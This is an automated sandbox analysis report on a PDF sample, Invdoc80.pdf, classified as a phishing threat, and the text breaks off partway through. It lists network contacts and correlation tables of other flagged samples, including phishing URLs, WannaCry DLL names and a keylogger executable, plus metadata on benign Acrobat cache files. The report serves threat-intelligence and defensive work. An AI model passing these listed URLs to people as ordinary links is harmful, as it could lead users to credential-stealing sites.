                                54113FASTLYUSfalse
                                239.255.255.250
                                unknownReserved
                                unknownunknownfalse
                                151.101.66.137
                                unknownUnited States
                                54113FASTLYUSfalse
                                35.190.80.1
                                a.nel.cloudflare.comUnited States
                                15169GOOGLEUSfalse
                                IP
                                192.168.2.4
                                Joe Sandbox version:42.0.0 Malachite
                                Analysis ID:1591561
                                Start date and time:2025-01-15 04:44:37 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 5m 49s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:defaultwindowspdfcookbook.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:13
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:Invdoc80.pdf
                                Detection:MAL
                                Classification:mal64.phis.winPDF@44/56@13/8
                                Cookbook Comments:
                                • Found application associated with file extension: .pdf
                                • Found PDF document
                                • Close Viewer
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 184.28.88.176, 3.219.243.226, 52.22.41.97, 52.6.155.20, 3.233.129.217, 2.16.168.105, 2.16.168.107, 172.64.41.3, 162.159.61.3, 23.209.209.135, 199.232.210.172, 184.30.131.245, 216.58.206.67, 216.58.212.142, 74.125.133.84, 142.250.185.110, 142.250.184.206, 142.250.185.170, 142.250.185.138, 142.250.186.74, 142.250.184.234, 142.250.186.138, 142.250.185.74, 142.250.185.234, 142.250.185.202, 142.250.186.170, 142.250.186.106, 172.217.16.202, 172.217.18.10, 216.58.212.138, 142.250.186.42, 216.58.206.74, 142.250.185.106, 172.217.23.106, 142.250.74.202, 216.58.206.78, 142.250.186.46, 172.217.16.206, 142.250.64.78, 74.125.0.102, 172.217.18.14, 142.250.65.174, 142.250.185.131, 142.250.184.238, 2.23.242.162, 23.56.162.204, 4.175.87.197, 13.107.246.45
                                • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, clientservices.googleapis.com, acroipm2.adobe.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, update.googleapis.com, r1---sn-t0aekn7e.gvt1.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, optimizationguide-pa.googleapis.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, armmf.adobe.com, r1.sn-t0aekn7e.gvt1.com, clients.l.google.com, geo2.adobe.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                TimeTypeDescription
                                22:45:50API Interceptor3x Sleep call for process: AcroCEF.exe modified
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                239.255.255.250https://padlet.com/prowebsolutions488/new-message-jba6y6w7rg9tzzmnGet hashmaliciousHTMLPhisherBrowse
                                  https://androiddatahost.com/sdsd3Get hashmaliciousUnknownBrowse
                                    Reversed order 24-25.pdfGet hashmaliciousUnknownBrowse
                                      Final-Agreement-Document#808977735.pdfGet hashmaliciousHTMLPhisherBrowse
                                        EXTERNAL Your company's credit limit has changed!.msgGet hashmaliciousUnknownBrowse
                                          https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/Computer-Zubehoer/b/?ie=UTF8&node=340843031&ref_=nav_cs_pcGet hashmaliciousUnknownBrowse
                                            https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/b/?_encoding=UTF8&_encoding=UTF8&node=3024314031&bbn=16435051&pd_rd_w=VSdHJ&content-id=amzn1.sym.01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_p=01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_r=E0WD16QK99B55VAWSKBQ&pd_rd_wg=EU3Lj&pd_rd_r=fd3510c2-a6e6-4f59-a468-c59aac80bfa9&ref_=pd_hp_d_btf_unkGet hashmaliciousUnknownBrowse
                                              https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/NYNY25/?_encoding=UTF8&pd_rd_w=WqHp4&content-id=amzn1.sym.33dfa5bb-d117-4590-a21d-8b7be5a7ab9d&pf_rd_p=33dfa5bb-d117-4590-a21d-8b7be5a7ab9d&pf_rd_r=E0WD16QK99B55VAWSKBQ&pd_rd_wg=EU3Lj&pd_rd_r=fd3510c2-a6e6-4f59-a468-c59aac80bfa9&ref_=pd_hp_d_btf_unkGet hashmaliciousUnknownBrowse
                                                http://carts-cancelseguro.info/seguro.htmlGet hashmaliciousUnknownBrowse
                                                  https://ziyahid.github.io/netflix-cloneGet hashmaliciousHTMLPhisherBrowse
                                                    151.101.66.137http://novo.oratoriomariano.com/novo/Get hashmaliciousUnknownBrowse
                                                    • code.jquery.com/jquery-3.3.1.min.js
                                                    http://facebooksecurity.blogspot.ch/Get hashmaliciousUnknownBrowse
                                                    • code.jquery.com/jquery-1.7.min.js
                                                    http://site9615380.92.webydo.com/?v=1Get hashmaliciousUnknownBrowse
                                                    • code.jquery.com/jquery-1.7.2.min.js
                                                    http://grandprairie-water-damage-restoration.comGet hashmaliciousUnknownBrowse
                                                    • code.jquery.com/jquery-3.3.1.min.js
                                                    2023121142000021ki01kvjs.htmlGet hashmaliciousUnknownBrowse
                                                    • code.jquery.com/jquery-latest.min.js
                                                    151.101.130.137http://mi-outlook-loggin.click/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                    • code.jquery.com/jquery-1.11.3.min.js
                                                    http://imaps-support.us/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                    • code.jquery.com/jquery-1.11.3.min.js
                                                    http://facebooksecurity.blogspot.ch/Get hashmaliciousUnknownBrowse
                                                    • code.jquery.com/jquery-1.7.min.js
                                                    https://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AING.shalominternationalministry.com/index.xml%23?email=amFtZXMubGVhZGJlYXRlckBsb2dpY2FsaXMuY29tGet hashmaliciousUnknownBrowse
                                                    • code.jquery.com/jquery-3.3.1.min.js
                                                    http://site9613885.92.webydo.com/?v=1Get hashmaliciousUnknownBrowse
                                                    • code.jquery.com/jquery-1.7.2.min.js
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    s3-r-w.ap-southeast-1.amazonaws.comhttp://www.rr8844.comGet hashmaliciousUnknownBrowse
                                                    • 3.5.146.228
                                                    Distribution Agreement -21_12_48-December 6, 2024-be1f31b3a4b24beb88d27adfd723203e.pdfGet hashmaliciousUnknownBrowse
                                                    • 3.5.151.143
                                                    http://jackelec.com.au/Get hashmaliciousHTMLPhisherBrowse
                                                    • 3.5.148.229
                                                    https://cx.surveysensum.com/d6xqqwvxGet hashmaliciousHTMLPhisherBrowse
                                                    • 52.219.40.43
                                                    https://stackby.com/form/frshr1730989479744b2c855Get hashmaliciousHTMLPhisherBrowse
                                                    • 52.219.184.6
                                                    https://granddunman-info.com/Get hashmaliciousUnknownBrowse
                                                    • 3.5.146.249
                                                    https://dltxc.s3.ap-southeast-1.amazonaws.com/svs/wx.htm?eml=test@yahoo.comGet hashmaliciousHTMLPhisherBrowse
                                                    • 3.5.149.122
                                                    https://stackby.com/view/vwshr17265453204549a34eaGet hashmaliciousHTMLPhisherBrowse
                                                    • 52.219.124.219
                                                    https://cx.surveysensum.com/fd3ButxpGet hashmaliciousUnknownBrowse
                                                    • 52.219.184.2
                                                    https://www.eventthai.com/Get hashmaliciousPhisherBrowse
                                                    • 52.219.41.35
                                                    code.jquery.comhttps://padlet.com/prowebsolutions488/new-message-jba6y6w7rg9tzzmnGet hashmaliciousHTMLPhisherBrowse
                                                    • 151.101.2.137
                                                    Final-Agreement-Document#808977735.pdfGet hashmaliciousHTMLPhisherBrowse
                                                    • 151.101.194.137
                                                    https://sreamconmymnltty.com/scerty/bliun/bolopGet hashmaliciousUnknownBrowse
                                                    • 151.101.130.137
                                                    https://suman006723213.github.io/garena.reward.ff/Get hashmaliciousHTMLPhisherBrowse
                                                    • 151.101.194.137
                                                    http://optimize-system-upgrades.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                    • 151.101.194.137
                                                    https://bafkreibsbjyfimxhx74m5tcypjri7hfpts4m6rwijhar7bcrbkwhh2xgbe.ipfs.flk-ipfs.xyz/Get hashmaliciousHTMLPhisherBrowse
                                                    • 151.101.66.137
                                                    https://6y.tickarmoz.ru/aY57/Get hashmaliciousUnknownBrowse
                                                    • 151.101.194.137
                                                    Eastern Contractors Corporation Contract and submittal document.emlGet hashmaliciousUnknownBrowse
                                                    • 151.101.130.137
                                                    https://emp.eduyield.com/el?aid=962445be-3c17-11ec-9620-0e45aa61dde5&cid=497&dest=https://google.com/amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3&pid=564628&rid=68730789Get hashmaliciousUnknownBrowse
                                                    • 151.101.194.137
                                                    logitix.pdfGet hashmaliciousHTMLPhisherBrowse
                                                    • 151.101.66.137
                                                    bg.microsoft.map.fastly.netReversed order 24-25.pdfGet hashmaliciousUnknownBrowse
                                                    • 199.232.210.172
                                                    wmnq39xe8J.dllGet hashmaliciousWannacryBrowse
                                                    • 199.232.214.172
                                                    Final-Agreement-Document#808977735.pdfGet hashmaliciousHTMLPhisherBrowse
                                                    • 199.232.210.172
                                                    tTbeoLWNhb.dllGet hashmaliciousWannacryBrowse
                                                    • 199.232.214.172
                                                    Document-01-16-25.pdfGet hashmaliciousUnknownBrowse
                                                    • 199.232.210.172
                                                    Eastern Contractors Corporation Contract and submittal document.emlGet hashmaliciousUnknownBrowse
                                                    • 199.232.214.172
                                                    v9xYj92wR3.dllGet hashmaliciousWannacryBrowse
                                                    • 199.232.214.172
                                                    https://securityalert-corporate.com/click/f288bff9-842d-4e34-8d2d-41ad20e48e9dGet hashmaliciousUnknownBrowse
                                                    • 199.232.214.172
                                                    FjSrGs0AE2.dllGet hashmaliciousWannacryBrowse
                                                    • 199.232.214.172
                                                    jgd5ZGl1vA.dllGet hashmaliciousWannacryBrowse
                                                    • 199.232.214.172
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    FASTLYUShttps://padlet.com/prowebsolutions488/new-message-jba6y6w7rg9tzzmnGet hashmaliciousHTMLPhisherBrowse
                                                    • 151.101.2.137
                                                    Reversed order 24-25.pdfGet hashmaliciousUnknownBrowse
                                                    • 185.199.109.133
                                                    Final-Agreement-Document#808977735.pdfGet hashmaliciousHTMLPhisherBrowse
                                                    • 151.101.194.137
                                                    https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/Computer-Zubehoer/b/?ie=UTF8&node=340843031&ref_=nav_cs_pcGet hashmaliciousUnknownBrowse
                                                    • 151.101.65.16
                                                    https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/b/?_encoding=UTF8&_encoding=UTF8&node=3024314031&bbn=16435051&pd_rd_w=VSdHJ&content-id=amzn1.sym.01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_p=01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_r=E0WD16QK99B55VAWSKBQ&pd_rd_wg=EU3Lj&pd_rd_r=fd3510c2-a6e6-4f59-a468-c59aac80bfa9&ref_=pd_hp_d_btf_unkGet hashmaliciousUnknownBrowse
                                                    • 151.101.129.16
                                                    https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/NYNY25/?_encoding=UTF8&pd_rd_w=WqHp4&content-id=amzn1.sym.33dfa5bb-d117-4590-a21d-8b7be5a7ab9d&pf_rd_p=33dfa5bb-d117-4590-a21d-8b7be5a7ab9d&pf_rd_r=E0WD16QK99B55VAWSKBQ&pd_rd_wg=EU3Lj&pd_rd_r=fd3510c2-a6e6-4f59-a468-c59aac80bfa9&ref_=pd_hp_d_btf_unkGet hashmaliciousUnknownBrowse
                                                    • 151.101.65.16
                                                    https://ziyahid.github.io/netflix-cloneGet hashmaliciousHTMLPhisherBrowse
                                                    • 185.199.108.153
                                                    https://tvtsrilanka.com/Agrr/Get hashmaliciousUnknownBrowse
                                                    • 151.101.129.229
                                                    http://metapromation.vercel.app/pagez/Get hashmaliciousUnknownBrowse
                                                    • 151.101.129.229
                                                    https://sreamconmymnltty.com/scerty/bliun/bolopGet hashmaliciousUnknownBrowse
                                                    • 199.232.192.193
                                                    AMAZON-02UShttps://padlet.com/prowebsolutions488/new-message-jba6y6w7rg9tzzmnGet hashmaliciousHTMLPhisherBrowse
                                                    • 18.245.86.58
                                                    XB6SkLK7Al.dllGet hashmaliciousWannacryBrowse
                                                    • 3.121.114.254
                                                    ue5QSYCBPt.dllGet hashmaliciousWannacryBrowse
                                                    • 54.170.200.2
                                                    wmnq39xe8J.dllGet hashmaliciousWannacryBrowse
                                                    • 130.176.180.137
                                                    330tqxXVzm.dllGet hashmaliciousWannacryBrowse
                                                    • 54.65.187.1
                                                    EXTERNAL Your company's credit limit has changed!.msgGet hashmaliciousUnknownBrowse
                                                    • 52.222.236.94
                                                    https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/Computer-Zubehoer/b/?ie=UTF8&node=340843031&ref_=nav_cs_pcGet hashmaliciousUnknownBrowse
                                                    • 3.254.238.10
                                                    https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/b/?_encoding=UTF8&_encoding=UTF8&node=3024314031&bbn=16435051&pd_rd_w=VSdHJ&content-id=amzn1.sym.01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_p=01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_r=E0WD16QK99B55VAWSKBQ&pd_rd_wg=EU3Lj&pd_rd_r=fd3510c2-a6e6-4f59-a468-c59aac80bfa9&ref_=pd_hp_d_btf_unkGet hashmaliciousUnknownBrowse
                                                    • 34.240.238.69
                                                    https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/NYNY25/?_encoding=UTF8&pd_rd_w=WqHp4&content-id=amzn1.sym.33dfa5bb-d117-4590-a21d-8b7be5a7ab9d&pf_rd_p=33dfa5bb-d117-4590-a21d-8b7be5a7ab9d&pf_rd_r=E0WD16QK99B55VAWSKBQ&pd_rd_wg=EU3Lj&pd_rd_r=fd3510c2-a6e6-4f59-a468-c59aac80bfa9&ref_=pd_hp_d_btf_unkGet hashmaliciousUnknownBrowse
                                                    • 108.138.7.91
                                                    http://industrious-tomato-ngvkcs.mystrikingly.com/Get hashmaliciousUnknownBrowse
                                                    • 52.84.150.39
                                                    CLOUDFLARENETUShttps://padlet.com/prowebsolutions488/new-message-jba6y6w7rg9tzzmnGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.22.67.248
                                                    rDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 104.21.96.1
                                                    https://androiddatahost.com/sdsd3Get hashmaliciousUnknownBrowse
                                                    • 104.21.80.92
                                                    Final-Agreement-Document#808977735.pdfGet hashmaliciousHTMLPhisherBrowse
                                                    • 188.114.96.3
                                                    EXTERNAL Your company's credit limit has changed!.msgGet hashmaliciousUnknownBrowse
                                                    • 104.17.25.14
                                                    https://tvtsrilanka.com/Agrr/Get hashmaliciousUnknownBrowse
                                                    • 104.18.11.207
                                                    http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.htmlGet hashmaliciousHTMLPhisherBrowse
                                                    • 172.66.0.235
                                                    http://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.htmlGet hashmaliciousHTMLPhisherBrowse
                                                    • 172.66.0.235
                                                    http://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.htmlGet hashmaliciousHTMLPhisherBrowse
                                                    • 172.66.0.235
                                                    http://industrious-tomato-ngvkcs.mystrikingly.com/Get hashmaliciousUnknownBrowse
                                                    • 104.17.24.14
                                                    FASTLYUShttps://padlet.com/prowebsolutions488/new-message-jba6y6w7rg9tzzmnGet hashmaliciousHTMLPhisherBrowse
                                                    • 151.101.2.137
                                                    Reversed order 24-25.pdfGet hashmaliciousUnknownBrowse
                                                    • 185.199.109.133
                                                    Final-Agreement-Document#808977735.pdfGet hashmaliciousHTMLPhisherBrowse
                                                    • 151.101.194.137
                                                    https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/Computer-Zubehoer/b/?ie=UTF8&node=340843031&ref_=nav_cs_pcGet hashmaliciousUnknownBrowse
                                                    • 151.101.65.16
                                                    https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/b/?_encoding=UTF8&_encoding=UTF8&node=3024314031&bbn=16435051&pd_rd_w=VSdHJ&content-id=amzn1.sym.01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_p=01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_r=E0WD16QK99B55VAWSKBQ&pd_rd_wg=EU3Lj&pd_rd_r=fd3510c2-a6e6-4f59-a468-c59aac80bfa9&ref_=pd_hp_d_btf_unkGet hashmaliciousUnknownBrowse
                                                    • 151.101.129.16
                                                    https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/NYNY25/?_encoding=UTF8&pd_rd_w=WqHp4&content-id=amzn1.sym.33dfa5bb-d117-4590-a21d-8b7be5a7ab9d&pf_rd_p=33dfa5bb-d117-4590-a21d-8b7be5a7ab9d&pf_rd_r=E0WD16QK99B55VAWSKBQ&pd_rd_wg=EU3Lj&pd_rd_r=fd3510c2-a6e6-4f59-a468-c59aac80bfa9&ref_=pd_hp_d_btf_unkGet hashmaliciousUnknownBrowse
                                                    • 151.101.65.16
                                                    https://ziyahid.github.io/netflix-cloneGet hashmaliciousHTMLPhisherBrowse
                                                    • 185.199.108.153
                                                    https://tvtsrilanka.com/Agrr/Get hashmaliciousUnknownBrowse
                                                    • 151.101.129.229
                                                    http://metapromation.vercel.app/pagez/Get hashmaliciousUnknownBrowse
                                                    • 151.101.129.229
                                                    https://sreamconmymnltty.com/scerty/bliun/bolopGet hashmaliciousUnknownBrowse
                                                    • 199.232.192.193
                                                    No context
                                                    No context
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):292
                                                    Entropy (8bit):5.208515410706153
                                                    Encrypted:false
                                                    SSDEEP:6:iO83V8yq2Pwkn2nKuAl9OmbnIFUtW3Vxz1Zmwo3VxlRkwOwkn2nKuAl9OmbjLJ:7KV8yvYfHAahFUt4VxZ/GVxlR5JfHAae
                                                    MD5:C5A738CC604F4A4A3CC9205388712C24
                                                    SHA1:42A037F59EEB9CBD27E73A6328B271AFF9A74E90
                                                    SHA-256:92E183F18330FC1DD166147A71D6BCDB41AB8D0D990AF332C22850819B4CE5EE
                                                    SHA-512:97B1557D6BADC7A2A6538B4C12B2ECC79C633804E0163017058201BD46BE698CB643D6349FC57F64E04B8B730DEF5D084B87C1C766B3337FAEF6E2CC58C08E39
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:2025/01/14-22:45:37.413 1e34 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/14-22:45:37.416 1e34 Recovering log #3.2025/01/14-22:45:37.416 1e34 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):292
                                                    Entropy (8bit):5.208515410706153
                                                    Encrypted:false
                                                    SSDEEP:6:iO83V8yq2Pwkn2nKuAl9OmbnIFUtW3Vxz1Zmwo3VxlRkwOwkn2nKuAl9OmbjLJ:7KV8yvYfHAahFUt4VxZ/GVxlR5JfHAae
                                                    MD5:C5A738CC604F4A4A3CC9205388712C24
                                                    SHA1:42A037F59EEB9CBD27E73A6328B271AFF9A74E90
                                                    SHA-256:92E183F18330FC1DD166147A71D6BCDB41AB8D0D990AF332C22850819B4CE5EE
                                                    SHA-512:97B1557D6BADC7A2A6538B4C12B2ECC79C633804E0163017058201BD46BE698CB643D6349FC57F64E04B8B730DEF5D084B87C1C766B3337FAEF6E2CC58C08E39
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:2025/01/14-22:45:37.413 1e34 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/14-22:45:37.416 1e34 Recovering log #3.2025/01/14-22:45:37.416 1e34 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):336
                                                    Entropy (8bit):5.24274809173656
                                                    Encrypted:false
                                                    SSDEEP:6:iO83VyFL+q2Pwkn2nKuAl9Ombzo2jMGIFUtW3Vfm1Zmwo3VfLVkwOwkn2nKuAl97:7KVmyvYfHAa8uFUt4VY/GVfR5JfHAa8z
                                                    MD5:23AB952C55108F2FDE3512FC917B1107
                                                    SHA1:D780D8540A344F39FF4FFCFE783D4FD7AD5EA19A
                                                    SHA-256:0E57F12A8667FEA9B8D9660FBD5B46F6A2300467B870E37CA56425505EBFAB69
                                                    SHA-512:C6942C50C19DCAE57381FAD57A63E22A9F72D42C3D44948ADE6F0E5A7B9A510C339E12E08D271D3D6C502C0D57C50053759AA3024F01A926647460812369C94A
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:2025/01/14-22:45:37.489 1f18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/14-22:45:37.490 1f18 Recovering log #3.2025/01/14-22:45:37.491 1f18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):336
                                                    Entropy (8bit):5.24274809173656
                                                    Encrypted:false
                                                    SSDEEP:6:iO83VyFL+q2Pwkn2nKuAl9Ombzo2jMGIFUtW3Vfm1Zmwo3VfLVkwOwkn2nKuAl97:7KVmyvYfHAa8uFUt4VY/GVfR5JfHAa8z
                                                    MD5:23AB952C55108F2FDE3512FC917B1107
                                                    SHA1:D780D8540A344F39FF4FFCFE783D4FD7AD5EA19A
                                                    SHA-256:0E57F12A8667FEA9B8D9660FBD5B46F6A2300467B870E37CA56425505EBFAB69
                                                    SHA-512:C6942C50C19DCAE57381FAD57A63E22A9F72D42C3D44948ADE6F0E5A7B9A510C339E12E08D271D3D6C502C0D57C50053759AA3024F01A926647460812369C94A
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:2025/01/14-22:45:37.489 1f18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/14-22:45:37.490 1f18 Recovering log #3.2025/01/14-22:45:37.491 1f18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:JSON data
                                                    Category:modified
                                                    Size (bytes):475
                                                    Entropy (8bit):4.9720157075394615
                                                    Encrypted:false
                                                    SSDEEP:12:YH/um3RA8sq5lIDsBdOg2H1caq3QYiubInP7E4T3y:Y2sRdsAGEdMH03QYhbG7nby
                                                    MD5:A02EAFBF38032CA262ED5382AB459F50
                                                    SHA1:BFCE73EF00E94FC19339B217AEEA8A94AA639F80
                                                    SHA-256:C6781F8EC7020B0A1DFC02E74DEA6BC4B95AF196061ED2FD77B9E481D7029A72
                                                    SHA-512:9B4DACFEC2C7986E976687AEB9E1008F5DECE6959088C06360579F67653AA139851C8B78DE4FB0C1B9A8558EB28F76DF4A9A9AA0652704FF12017E89D9F69ABF
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381472749927957","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":127900},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):475
                                                    Entropy (8bit):4.9720157075394615
                                                    Encrypted:false
                                                    SSDEEP:12:YH/um3RA8sq5lIDsBdOg2H1caq3QYiubInP7E4T3y:Y2sRdsAGEdMH03QYhbG7nby
                                                    MD5:A02EAFBF38032CA262ED5382AB459F50
                                                    SHA1:BFCE73EF00E94FC19339B217AEEA8A94AA639F80
                                                    SHA-256:C6781F8EC7020B0A1DFC02E74DEA6BC4B95AF196061ED2FD77B9E481D7029A72
                                                    SHA-512:9B4DACFEC2C7986E976687AEB9E1008F5DECE6959088C06360579F67653AA139851C8B78DE4FB0C1B9A8558EB28F76DF4A9A9AA0652704FF12017E89D9F69ABF
                                                    Malicious:false
                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381472749927957","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":127900},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):4730
                                                    Entropy (8bit):5.25457266241917
                                                    Encrypted:false
                                                    SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7iD3wD65Z:etJCV4FiN/jTN/2r8Mta02fEhgO73goI
                                                    MD5:B35A74D2D42064FECEE7E64E9E93B974
                                                    SHA1:6335BEE08926DB02B8EACFA514DA0A1F53A2C691
                                                    SHA-256:79C597F3456C8CEDD12A5B54D6B4E374F1B7CD0001BDDF71899C2FCFB0B2B71D
                                                    SHA-512:15371FD8668F388DEB58C22FF43AF1AAB6A88D5ADF24CE866055A9A84FD1ED9EC4744DFA71D2E84FCAE469BE7ACA6B2657A1DEBBAC834BEB2C0FFB3A7C0A5A3E
                                                    Malicious:false
                                                    Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):324
                                                    Entropy (8bit):5.253858478870673
                                                    Encrypted:false
                                                    SSDEEP:6:iO83VXL+q2Pwkn2nKuAl9OmbzNMxIFUtW3V/T1Zmwo3VtIdjLVkwOwkn2nKuAl9c:7KVXyvYfHAa8jFUt4V/5/GVSdjR5JfHP
                                                    MD5:19C4CC67AD21FECF906C37BAA3E02E63
